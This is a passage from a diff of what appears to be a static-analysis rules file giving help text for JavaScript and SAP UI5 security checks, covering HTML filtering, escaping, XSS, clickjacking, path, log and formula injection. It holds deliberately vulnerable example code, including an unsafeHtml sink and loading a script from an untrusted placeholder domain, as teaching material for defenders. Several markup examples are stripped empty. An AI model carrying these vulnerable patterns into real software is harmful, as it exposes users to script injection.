[CWE-184](https://cwe.mitre.org/data/definitions/184.html).\n* Common Weakness Enumeration: [CWE-185](https://cwe.mitre.org/data/definitions/185.html).\n* Common Weakness Enumeration: [CWE-186](https://cwe.mitre.org/data/definitions/186.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "external/cwe/cwe-020", "external/cwe/cwe-080", "external/cwe/cwe-116", "external/cwe/cwe-184", "external/cwe/cwe-185", "external/cwe/cwe-186" ], - "description" : "Matching HTML tags using regular expressions is hard to do right, and can easily lead to security issues.", - "id" : "js/bad-tag-filter", - "kind" : "problem", - "name" : "Bad HTML filtering regexp", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.8" - } - }, { - "id" : "js/double-escaping", - "name" : 
"js/double-escaping", - "shortDescription" : { - "text" : "Double escaping or unescaping" - }, - "fullDescription" : { - "text" : "When escaping special characters using a meta-character like backslash or ampersand, the meta-character has to be escaped first to avoid double-escaping, and conversely it has to be unescaped last to avoid double-unescaping." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Double escaping or unescaping\nEscaping meta-characters in untrusted input is an important technique for preventing injection attacks such as cross-site scripting. One particular example of this is HTML entity encoding, where HTML special characters are replaced by HTML character entities to prevent them from being interpreted as HTML markup. For example, the less-than character is encoded as `<` and the double-quote character as `"`. Other examples include backslash-escaping for including untrusted data in string literals and percent-encoding for URI components.\n\nThe reverse process of replacing escape sequences with the characters they represent is known as unescaping.\n\nNote that the escape characters themselves (such as ampersand in the case of HTML encoding) play a special role during escaping and unescaping: they are themselves escaped, but also form part of the escaped representations of other characters. Hence care must be taken to avoid double escaping and unescaping: when escaping, the escape character must be escaped first, when unescaping it has to be unescaped last.\n\nIf used in the context of sanitization, double unescaping may render the sanitization ineffective. Even if it is not used in a security-critical context, it may still result in confusing or garbled output.\n\n\n## Recommendation\nUse a (well-tested) sanitization library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation. 
For URI encoding, you can use the standard `encodeURIComponent` and `decodeURIComponent` functions.\n\nOtherwise, make sure to always escape the escape character first, and unescape it last.\n\n\n## Example\nThe following example shows a pair of hand-written HTML encoding and decoding functions:\n\n\n```javascript\nmodule.exports.encode = function(s) {\n return s.replace(/&/g, \"&\")\n .replace(/\"/g, \""\")\n .replace(/'/g, \"'\");\n};\n\nmodule.exports.decode = function(s) {\n return s.replace(/&/g, \"&\")\n .replace(/"/g, \"\\\"\")\n .replace(/'/g, \"'\");\n};\n\n```\nThe encoding function correctly handles ampersand before the other characters. For example, the string `me & \"you\"` is encoded as `me & "you"`, and the string `"` is encoded as `&quot;`.\n\nThe decoding function, however, incorrectly decodes `&` into `&` before handling the other characters. So while it correctly decodes the first example above, it decodes the second example (`&quot;`) to `\"` (a single double quote), which is not correct.\n\nInstead, the decoding function should decode the ampersand last:\n\n\n```javascript\nmodule.exports.encode = function(s) {\n return s.replace(/&/g, \"&\")\n .replace(/\"/g, \""\")\n .replace(/'/g, \"'\");\n};\n\nmodule.exports.decode = function(s) {\n return s.replace(/"/g, \"\\\"\")\n .replace(/'/g, \"'\")\n .replace(/&/g, \"&\");\n};\n\n```\n\n## References\n* OWASP Top 10: [A1 Injection](https://www.owasp.org/index.php/Top_10-2017_A1-Injection).\n* npm: [html-entities](https://www.npmjs.com/package/html-entities) package.\n* npm: [js-string-escape](https://www.npmjs.com/package/js-string-escape) package.\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n", - "markdown" : "# Double escaping or unescaping\nEscaping meta-characters in untrusted input is an important technique for preventing injection attacks such as cross-site 
scripting. One particular example of this is HTML entity encoding, where HTML special characters are replaced by HTML character entities to prevent them from being interpreted as HTML markup. For example, the less-than character is encoded as `<` and the double-quote character as `"`. Other examples include backslash-escaping for including untrusted data in string literals and percent-encoding for URI components.\n\nThe reverse process of replacing escape sequences with the characters they represent is known as unescaping.\n\nNote that the escape characters themselves (such as ampersand in the case of HTML encoding) play a special role during escaping and unescaping: they are themselves escaped, but also form part of the escaped representations of other characters. Hence care must be taken to avoid double escaping and unescaping: when escaping, the escape character must be escaped first, when unescaping it has to be unescaped last.\n\nIf used in the context of sanitization, double unescaping may render the sanitization ineffective. Even if it is not used in a security-critical context, it may still result in confusing or garbled output.\n\n\n## Recommendation\nUse a (well-tested) sanitization library if at all possible. These libraries are much more likely to handle corner cases correctly than a custom implementation. For URI encoding, you can use the standard `encodeURIComponent` and `decodeURIComponent` functions.\n\nOtherwise, make sure to always escape the escape character first, and unescape it last.\n\n\n## Example\nThe following example shows a pair of hand-written HTML encoding and decoding functions:\n\n\n```javascript\nmodule.exports.encode = function(s) {\n return s.replace(/&/g, \"&\")\n .replace(/\"/g, \""\")\n .replace(/'/g, \"'\");\n};\n\nmodule.exports.decode = function(s) {\n return s.replace(/&/g, \"&\")\n .replace(/"/g, \"\\\"\")\n .replace(/'/g, \"'\");\n};\n\n```\nThe encoding function correctly handles ampersand before the other characters. 
For example, the string `me & \"you\"` is encoded as `me & "you"`, and the string `"` is encoded as `&quot;`.\n\nThe decoding function, however, incorrectly decodes `&` into `&` before handling the other characters. So while it correctly decodes the first example above, it decodes the second example (`&quot;`) to `\"` (a single double quote), which is not correct.\n\nInstead, the decoding function should decode the ampersand last:\n\n\n```javascript\nmodule.exports.encode = function(s) {\n return s.replace(/&/g, \"&\")\n .replace(/\"/g, \""\")\n .replace(/'/g, \"'\");\n};\n\nmodule.exports.decode = function(s) {\n return s.replace(/"/g, \"\\\"\")\n .replace(/'/g, \"'\")\n .replace(/&/g, \"&\");\n};\n\n```\n\n## References\n* OWASP Top 10: [A1 Injection](https://www.owasp.org/index.php/Top_10-2017_A1-Injection).\n* npm: [html-entities](https://www.npmjs.com/package/html-entities) package.\n* npm: [js-string-escape](https://www.npmjs.com/package/js-string-escape) package.\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n* Common Weakness Enumeration: [CWE-20](https://cwe.mitre.org/data/definitions/20.html).\n" - }, - "properties" : { - "tags" : [ "correctness", "security", "external/cwe/cwe-116", "external/cwe/cwe-020" ], - "description" : "When escaping special characters using a meta-character like backslash or\n ampersand, the meta-character has to be escaped first to avoid double-escaping,\n and conversely it has to be unescaped last to avoid double-unescaping.", - "id" : "js/double-escaping", - "kind" : "problem", - "name" : "Double escaping or unescaping", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.8" - } - }, { - "id" : "js/incomplete-multi-character-sanitization", - "name" : "js/incomplete-multi-character-sanitization", - "shortDescription" : { - "text" : "Incomplete multi-character sanitization" - }, - "fullDescription" : { - "text" : "A sanitizer that removes a sequence of 
characters may reintroduce the dangerous sequence." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Incomplete multi-character sanitization\nSanitizing untrusted input is a common technique for preventing injection attacks and other security vulnerabilities. Regular expressions are often used to perform this sanitization. However, when the regular expression matches multiple consecutive characters, replacing it just once can result in the unsafe text reappearing in the sanitized input.\n\nAttackers can exploit this issue by crafting inputs that, when sanitized with an ineffective regular expression, still contain malicious code or content. This can lead to code execution, data exposure, or other vulnerabilities.\n\n\n## Recommendation\nTo prevent this issue, it is highly recommended to use a well-tested sanitization library whenever possible. These libraries are more likely to handle corner cases and ensure effective sanitization.\n\nIf a library is not an option, you can consider alternative strategies to fix the issue. 
For example, applying the regular expression replacement repeatedly until no more replacements can be performed, or rewriting the regular expression to match single characters instead of the entire unsafe text.\n\n\n## Example\nConsider the following JavaScript code that aims to remove all HTML comment start and end tags:\n\n```javascript\n\nstr.replace(/\n \n\n```\n\n``` javascript\nsap.ui.define([\"sap/ui/core/mvc/Controller\", \"sap/ui/model/json/JSONModel\"],\n function (Controller, JSONModel) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function () {\n var oData = { input: null };\n var oModel = new JSONModel(oData);\n this.getView().setModel(oModel);\n },\n });\n },\n);\n```\n\nThe issue can be resolved by setting the `HTML` control's `sanitizeContent` attribute to true.\n\n``` xml\n\n \n \n\n```\n\n## References\n\n- OWASP: [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n- SAP UI5 Documentation: [Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/91f0bd316f4d1014b6dd926db0e91070.html) in UI5.\n- SAP UI5 Documentation: [Prevention of Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/4de64e2e191f4a7297d4fd2d1e233a2d.html) in UI5.\n- SAP UI5 Documentation: [API Documentation of sap.ui.core.RenderManager](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.RenderManager).\n- SAP UI5 Documentation: [Defining Control Properties](https://sapui5.hana.ondemand.com/sdk/#/topic/ac56d92162ed47ff858fdf1ce26c18c4.html).\n- SAP UI5 Documentation: [Expression Binding](https://sapui5.hana.ondemand.com/sdk/#/topic/daf6852a04b44d118963968a1239d2c0).\n- SAP UI5 API Reference: [`sap.ui.core.HTML`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.HTML%23methods/setSanitizeContent).\n- Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n- Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", + "markdown" : "# 
Client-side cross-site scripting\n\nReceiving text from the user, most notably through a control, and rendering it as HTML in another control can lead to a cross-site scripting vulnerability.\n\n## Recommendation\n\n### Preventing XSS Involving User Defined Control\n\nIf the XSS attack vector includes a user-defined control, then we can mitigate the issue by sanitizing the user-provided input in the implementation of the control:\n- Where possible, define the property type to something other than `string` or `any`. If a value should be used, then opt for the `enum` type which only allows a predefined set of strings.\n- Use escaping functions in `sap.base.security`. Relevant sanitizers include `encodeXML` and `encodeHTML`.\n- When using API with `apiVersion: 2` (Semantic Rendering), do not use `RenderManager.unsafeHtml` unless the control property `sanitizeContent` is set to `true`.\n- When using the now-deprecated older API with `RenderManager.write` or `RenderManager.writeAttribute`, use their respective counterparts `RenderManager.writeEscaped` and `RenderManager.writeAttributeEscaped` which sanitizes their rendered contents.\n\n### Preventing XSS Not Involving User Defined Control\n\nAn XSS attack vector can still exist even when no user-defined control is used. In this case, a model property or a control property act as an intermediate step when external data is passed in.\nIn this case, the UI5 application should not use the property as is, but should sanitize the contents before reading it. Such sanitization can take place in the controller or in the view declaration using expression bindings.\n\n## Example\n\n### Custom Control with Custom Rendering Method\n\nThis custom control `vulnerable.control.xss` calls `unsafeHtml` on a given `RenderManager` instance in its static renderer function. Since its `text` property is an unrestricted string type, it can point to a string with contents that can be interpreted as HTML. 
If it is the case, `unsafeHtml` will render the string, running a possibly embedded JavaScript code in it.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\"], function (Control) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"string\" } } },\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(oControl.getText()); // sink\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\nThis is the same custom control without the possibility of XSS using several means of sanitization: The property `text` is enforced to a non-string type, hence disallows unrestricted strings (This is espcially applicable if the expected input is a number anyways). Also, the `sap.base.security.encodeXML` function is used to escape HTML control characters.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\", \"sap/base/security/encodeXML\"], function (Control, encodeXML) {\n return Control.extend(\"vulnerable.control.xss\", {\n metadata: { properties: { text: { type: \"int\" } } }, // constrain the type\n renderer: {\n apiVersion: 2,\n render: function (oRm, oControl) {\n oRm.openStart(\"div\", oControl);\n oRm.unsafeHtml(encodeXML(oControl.getText()); // encode using security functions\n oRm.close(\"div\");\n }\n }\n });\n})\n```\n\n### Library Control\n\nThis example contains only library controls that are not user-defined. 
The untrusted user input flows from `sap.m.Input` and directly flows out via `sap.ui.core.HTML` through the model property `input` as declared in the `onInit` method of the controller.\n\n``` xml\n\n \t \n \n\n```\n\n``` javascript\nsap.ui.define([\"sap/ui/core/mvc/Controller\", \"sap/ui/model/json/JSONModel\"],\n function (Controller, JSONModel) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function () {\n var oData = { input: null };\n var oModel = new JSONModel(oData);\n this.getView().setModel(oModel);\n },\n });\n },\n);\n```\n\nThe issue can be resolved by setting the `HTML` control's `sanitizeContent` attribute to true.\n\n``` xml\n\n \n \n\n```\n\n## References\n\n- OWASP: [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n- SAP UI5 Documentation: [Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/91f0bd316f4d1014b6dd926db0e91070.html) in UI5.\n- SAP UI5 Documentation: [Prevention of Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/4de64e2e191f4a7297d4fd2d1e233a2d.html) in UI5.\n- SAP UI5 Documentation: [API Documentation of sap.ui.core.RenderManager](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.RenderManager).\n- SAP UI5 Documentation: [Defining Control Properties](https://sapui5.hana.ondemand.com/sdk/#/topic/ac56d92162ed47ff858fdf1ce26c18c4.html).\n- SAP UI5 Documentation: [Expression Binding](https://sapui5.hana.ondemand.com/sdk/#/topic/daf6852a04b44d118963968a1239d2c0).\n- SAP UI5 API Reference: [`sap.ui.core.HTML`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.HTML%23methods/setSanitizeContent).\n- Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n- Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-079", "external/cwe/cwe-116" ], + "description" : "Writing user input directly to a UI5 View allows for\n a 
cross-site scripting vulnerability.", + "id" : "js/ui5-xss", + "kind" : "path-problem", + "name" : "UI5 Client-side cross-site scripting", + "precision" : "high", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/ui5-clickjacking", + "name" : "js/ui5-clickjacking", + "shortDescription" : { + "text" : "UI5 Clickjacking" + }, + "fullDescription" : { + "text" : "The absence of frame options allows for clickjacking." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Clickjacking\n\nUI5 applications that do not explicitly set the frame options to `deny` may be vulnerable to UI redress attacks (”clickjacking”). In these attacks, the vulnerable site is loaded in a frame on an attacker-controlled site which uses opaque or transparent layers to trick the user into unintentionally clicking a button or link on the vulnerable site.\n\n## Recommendation\n\nExplicitly set the frame options to `\"deny\"`, either through `window[\"sap-ui-config\"]`, or `data-sap-ui-frameOptions` attribute of the script tag where it sources the bootstrap script `\"sap-ui-core.js\"`:\n\n``` javascript\nwindow[\"sap-ui-config\"] = {\n frameOptions: \"deny\",\n ...\n};\n```\n\n``` javascript\nwindow[\"sap-ui-config\"].frameOptions = \"deny\";\n```\n\n``` html\n\n```\n\n## Example\n\n### Setting the Frame Options to `\"allow\"`\n\nThis UI5 application explicitly allows to be embedded in other applications.\n\n```javascript\n\n\n \n ...\n \n\n \n \n ...\n\n```\n\n### Not Setting the Frame Options to Anything\n\nThe default value of `window[\"sap-ui-config\"]` and `data-sap-ui-frameOptions` are both `\"allow\"`, which makes leaving it untouched allows the application to be embedded.\n\n## References\n* OWASP: [Clickjacking Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html).\n* Mozilla: 
[X-Frame-Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options).\n* SAP UI5 Documentation: [Frame Options](https://sapui5.hana.ondemand.com/sdk/#/topic/62d9c4d8f5ad49aa914624af9551beb7.html).\n* SAP UI5 Documentation: [Allowlist Service](https://sapui5.hana.ondemand.com/sdk/#/topic/d04a6d41480c4396af16b5d2b25509ec.html).\n* Common Weakness Enumeration: [CWE-451](https://cwe.mitre.org/data/definitions/451.html).\n", + "markdown" : "# Clickjacking\n\nUI5 applications that do not explicitly set the frame options to `deny` may be vulnerable to UI redress attacks (”clickjacking”). In these attacks, the vulnerable site is loaded in a frame on an attacker-controlled site which uses opaque or transparent layers to trick the user into unintentionally clicking a button or link on the vulnerable site.\n\n## Recommendation\n\nExplicitly set the frame options to `\"deny\"`, either through `window[\"sap-ui-config\"]`, or `data-sap-ui-frameOptions` attribute of the script tag where it sources the bootstrap script `\"sap-ui-core.js\"`:\n\n``` javascript\nwindow[\"sap-ui-config\"] = {\n frameOptions: \"deny\",\n ...\n};\n```\n\n``` javascript\nwindow[\"sap-ui-config\"].frameOptions = \"deny\";\n```\n\n``` html\n\n```\n\n## Example\n\n### Setting the Frame Options to `\"allow\"`\n\nThis UI5 application explicitly allows to be embedded in other applications.\n\n```javascript\n\n\n \n ...\n \n\n \n \n ...\n\n```\n\n### Not Setting the Frame Options to Anything\n\nThe default value of `window[\"sap-ui-config\"]` and `data-sap-ui-frameOptions` are both `\"allow\"`, which makes leaving it untouched allows the application to be embedded.\n\n## References\n* OWASP: [Clickjacking Defense Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Clickjacking_Defense_Cheat_Sheet.html).\n* Mozilla: [X-Frame-Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options).\n* SAP UI5 Documentation: [Frame 
Options](https://sapui5.hana.ondemand.com/sdk/#/topic/62d9c4d8f5ad49aa914624af9551beb7.html).\n* SAP UI5 Documentation: [Allowlist Service](https://sapui5.hana.ondemand.com/sdk/#/topic/d04a6d41480c4396af16b5d2b25509ec.html).\n* Common Weakness Enumeration: [CWE-451](https://cwe.mitre.org/data/definitions/451.html).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-451" ], + "description" : "The absence of frame options allows for clickjacking.", + "id" : "js/ui5-clickjacking", + "kind" : "problem", + "name" : "UI5 Clickjacking", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "6.1" + } + }, { + "id" : "js/ui5-path-injection", + "name" : "js/ui5-path-injection", + "shortDescription" : { + "text" : "UI5 Path Injection" + }, + "fullDescription" : { + "text" : "Constructing path from an uncontrolled remote source to be passed to a filesystem API allows for manipulation of the local filesystem." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Client-side path injection\n\nUI5 applications that access files using a dynamically configured path are vulnerable to injection attacks that allow an attacker to manipulate the file location.\n\n## Recommendation\n\n### Make path argument independent of the user input\n\nIf possible, do not parameterize the path on a user input. Either hardcode the path string in the source, or use only strings that are created within the application.\n\n### Keep an allow-list of safe paths\n\nKeep a strict allow-list of safe paths to load from or send requests to. Before loading a script from a location outside the application or making an API request to a location, check if the path is contained in the list of safe paths. 
Also, make sure that the allow-list is kept up to date.\n\n### Check the script into the repository or use package managers\n\nSince the URL of the script may be pointing to a web server vulnerable to being hijacked, it may be a good idea to check a stable version of the script into the repository to increase the degree of control. If not possible, use a trusted package manager such as `npm`.\n\n## Example\n\n### Including scripts from an untrusted domain\n\n``` javascript\nsap.ui.require([\n \"sap/ui/dom/includeScript\"\n ],\n function(includeScript) {\n includeScript(\"http://some.vulnerable.domain/some-script.js\");\n }\n);\n```\n\nIf the vulnerable domain is outside the organization and controlled by an untrusted third party, this may result in arbitrary code execution in the user's browser.\n\n### Using user input as a name of a file to be saved\n\nSuppose a controller is configured to receive a response from a server as follows.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/core/util/File\"\n ],\n function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function() {\n let oDataV2Model = this.getOwnerComponent().getModel(\"some-ODatav2-model\");\n this.getView().setModel(oDataV2Model);\n },\n \n onSomeEvent: function() {\n let remoteResponse = this.getView().getModel().getProperty(\"someProperty\");\n File.save(\"some-content\", remoteResponse, \"txt\", \"text/plain\", \"utf-8\");\n }\n });\n });\n```\n\nEven if the server which updates the OData V2 model is in a trusted domain such as within the organization, the server may still contain tainted information if the UI5 application in question is vulnerable to other security attacks, say XSS. 
This may allow an attacker to save a file in the victim's local filesystem.\n\n## References\n\n- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n- Common Weakness Enumeration: [CWE-073](https://cwe.mitre.org/data/definitions/73.html).\n- SAP UI5 API Reference: [`sap.ui.core.util.File`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n- SAP UI5 API Reference: [`sap.ui.dom.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`sap.ui.dom.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeStylesheet).\n- SAP UI5 API Reference: [`jQuery.sap.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`jQuery.sap.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript).\n", + "markdown" : "# Client-side path injection\n\nUI5 applications that access files using a dynamically configured path are vulnerable to injection attacks that allow an attacker to manipulate the file location.\n\n## Recommendation\n\n### Make path argument independent of the user input\n\nIf possible, do not parameterize the path on a user input. Either hardcode the path string in the source, or use only strings that are created within the application.\n\n### Keep an allow-list of safe paths\n\nKeep a strict allow-list of safe paths to load from or send requests to. Before loading a script from a location outside the application or making an API request to a location, check if the path is contained in the list of safe paths. 
Also, make sure that the allow-list is kept up to date.\n\n### Check the script into the repository or use package managers\n\nSince the URL of the script may be pointing to a web server vulnerable to being hijacked, it may be a good idea to check a stable version of the script into the repository to increase the degree of control. If not possible, use a trusted package manager such as `npm`.\n\n## Example\n\n### Including scripts from an untrusted domain\n\n``` javascript\nsap.ui.require([\n \"sap/ui/dom/includeScript\"\n ],\n function(includeScript) {\n includeScript(\"http://some.vulnerable.domain/some-script.js\");\n }\n);\n```\n\nIf the vulnerable domain is outside the organization and controlled by an untrusted third party, this may result in arbitrary code execution in the user's browser.\n\n### Using user input as a name of a file to be saved\n\nSuppose a controller is configured to receive a response from a server as follows.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/core/util/File\"\n ],\n function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onInit: function() {\n let oDataV2Model = this.getOwnerComponent().getModel(\"some-ODatav2-model\");\n this.getView().setModel(oDataV2Model);\n },\n \n onSomeEvent: function() {\n let remoteResponse = this.getView().getModel().getProperty(\"someProperty\");\n File.save(\"some-content\", remoteResponse, \"txt\", \"text/plain\", \"utf-8\");\n }\n });\n });\n```\n\nEven if the server which updates the OData V2 model is in a trusted domain such as within the organization, the server may still contain tainted information if the UI5 application in question is vulnerable to other security attacks, say XSS. 
This may allow an attacker to save a file in the victim's local filesystem.\n\n## References\n\n- Common Weakness Enumeration: [CWE-829](https://cwe.mitre.org/data/definitions/829.html).\n- Common Weakness Enumeration: [CWE-073](https://cwe.mitre.org/data/definitions/73.html).\n- SAP UI5 API Reference: [`sap.ui.core.util.File`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save).\n- SAP UI5 API Reference: [`sap.ui.dom.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`sap.ui.dom.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeStylesheet).\n- SAP UI5 API Reference: [`jQuery.sap.includeScript`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript) and [`jQuery.sap.includeStyleSheet`](https://sapui5.hana.ondemand.com/sdk/#/api/module:sap/ui/dom/includeScript).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-022", "external/cwe/cwe-035" ], + "description" : "Constructing path from an uncontrolled remote source to be passed\n to a filesystem API allows for manipulation of the local filesystem.", + "id" : "js/ui5-path-injection", + "kind" : "path-problem", + "name" : "UI5 Path Injection", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "7.8" + } + }, { + "id" : "js/ui5-log-injection", + "name" : "js/ui5-log-injection", + "shortDescription" : { + "text" : "UI5 Log injection" + }, + "fullDescription" : { + "text" : "Building log entries from user-controlled sources is vulnerable to insertion of forged log entries by a malicious user." 
+ }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Log Injection\n\nIf an untrusted input, possibly through a UI5 control, is not sanitized and passed onto a logging function, it is possible that a malicious actor submits a crafted input which might lead to forging log entries. If the entries are logged as plaintext, then newline characters may be inserted by the malicious actor. If the entry is interpreted as HTML, then artitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nAvoid directly logging untrusted input from a remote source and sanitize it by replaceing characters so that the input no longer contains control characters and substrings that may be interpreted as HTML.\n\n## Examples\n\nThis UI5 application directly outputs what the user submitted via the `sap.m.Input` control.\n\n``` xml\n\n \n\n```\n\n``` javascript\nsap.ui.define(\n [\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/model/json/JSONModel\",\n \"sap/base/Log/info\",\n ],\n function (Controller, JSONModel, info) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSearchCompleted: function () {\n var oView = this.getView();\n var oSearchField = oView.byId(\"searchTodoItemsInput\");\n var searchValue = oSearchField.getValue();\n info(searchValue); // Sink\n },\n });\n },\n);\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP UI5 Documentation: [namespace `sap/base/Log`](https://sapui5.hana.ondemand.com/sdk/#api/module:sap/base/Log).\n", + "markdown" : "# Log Injection\n\nIf an untrusted input, possibly through a UI5 control, is not sanitized and passed onto a logging function, it is possible that a malicious actor submits a crafted input which might lead to forging log entries. 
If the entries are logged as plaintext, then newline characters may be inserted by the malicious actor. If the entry is interpreted as HTML, then artitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nAvoid directly logging untrusted input from a remote source and sanitize it by replaceing characters so that the input no longer contains control characters and substrings that may be interpreted as HTML.\n\n## Examples\n\nThis UI5 application directly outputs what the user submitted via the `sap.m.Input` control.\n\n``` xml\n\n \n\n```\n\n``` javascript\nsap.ui.define(\n [\n \"sap/ui/core/mvc/Controller\",\n \"sap/ui/model/json/JSONModel\",\n \"sap/base/Log/info\",\n ],\n function (Controller, JSONModel, info) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSearchCompleted: function () {\n var oView = this.getView();\n var oSearchField = oView.byId(\"searchTodoItemsInput\");\n var searchValue = oSearchField.getValue();\n info(searchValue); // Sink\n },\n });\n },\n);\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP UI5 Documentation: [namespace `sap/base/Log`](https://sapui5.hana.ondemand.com/sdk/#api/module:sap/base/Log).\n" + }, + "properties" : { + "tags" : [ "security", "external/cwe/cwe-117" ], + "description" : "Building log entries from user-controlled sources is vulnerable to\n insertion of forged log entries by a malicious user.", + "id" : "js/ui5-log-injection", + "kind" : "path-problem", + "name" : "UI5 Log injection", + "precision" : "medium", + "problem.severity" : "error", + "security-severity" : "7.8" + } + }, { + "id" : "js/ui5-formula-injection", + "name" : "js/ui5-formula-injection", + "shortDescription" : { + "text" : "UI5 Formula Injection" + }, + "fullDescription" : { + "text" : "Saving data from an uncontrolled remote source 
using filesystem or local storage leads to disclosure of sensitive information or forgery of entry." + }, + "defaultConfiguration" : { + "enabled" : true, + "level" : "error" + }, + "help" : { + "text" : "# Formula injection\n\nUI5 applications that save local data, fetched from an uncontrolled remote source, into a CSV file format using generic APIs such as [`sap.ui.core.util.File.save`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.util.File%23methods/sap.ui.core.util.File.save) are vulnerable to formula injection, or CSV injection.\n\n## Recommendation\n\n### Escape the leading special characters\n\nCSV cells containing leading special characters such as an equal sign (`=`) may be interpreted as spreadsheet formulas. To prevent them from being interpreted these prefixes should be escaped by surrounding the prefixes with single quotes in order to keep them as literal strings.\n\n### Use a dedicated API function\n\nManual construction of a CSV file using string concatenation is prone to mistakes that can lead to security issues. Instead, a dedicated library function should be used. 
For example, if the target being exported is a [`sap.m.Table`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.m.Table) and the resulting file is to intended to be opened using a spreadsheet program anyways, then using one of the API functions provided by [`sap.ui.export.Spreadsheet`](https://sapui5.hana.ondemand.com/#/entity/sap.ui.export.Spreadsheet) is the preferred method of achieving the same exporting functionality.\n\n## Example\n\nThe following controller is exporting a CSV file obtained from an event parameter by surrounding it in a pair of semicolons (`;`) as CSV separators.\n\n``` javascript\nsap.ui.define([\n \"sap/ui/core/Controller\",\n \"sap/ui/core/util/File\"\n ], function(Controller, File) {\n return Controller.extend(\"vulnerable.controller.app\", {\n onSomeEvent: function(oEvent) {\n let response = oEvent.getProperty(\"someProperty\").someField;\n let csvRow = \";\" + response + \";\";\n File.save(csvRow, \"someFile\", \"csv\", \"text/csv\", \"utf-8\");\n }\n });\n });\n```\n\n## References\n\n- OWASP: [CSV Injection](https://owasp.org/www-community/attacks/CSV_Injection).\n- Common Weakness Enumeration: [CWE-1236](https://cwe.mitre.org/data/definitions/1236.html).\n- SAP UI5 API Reference: 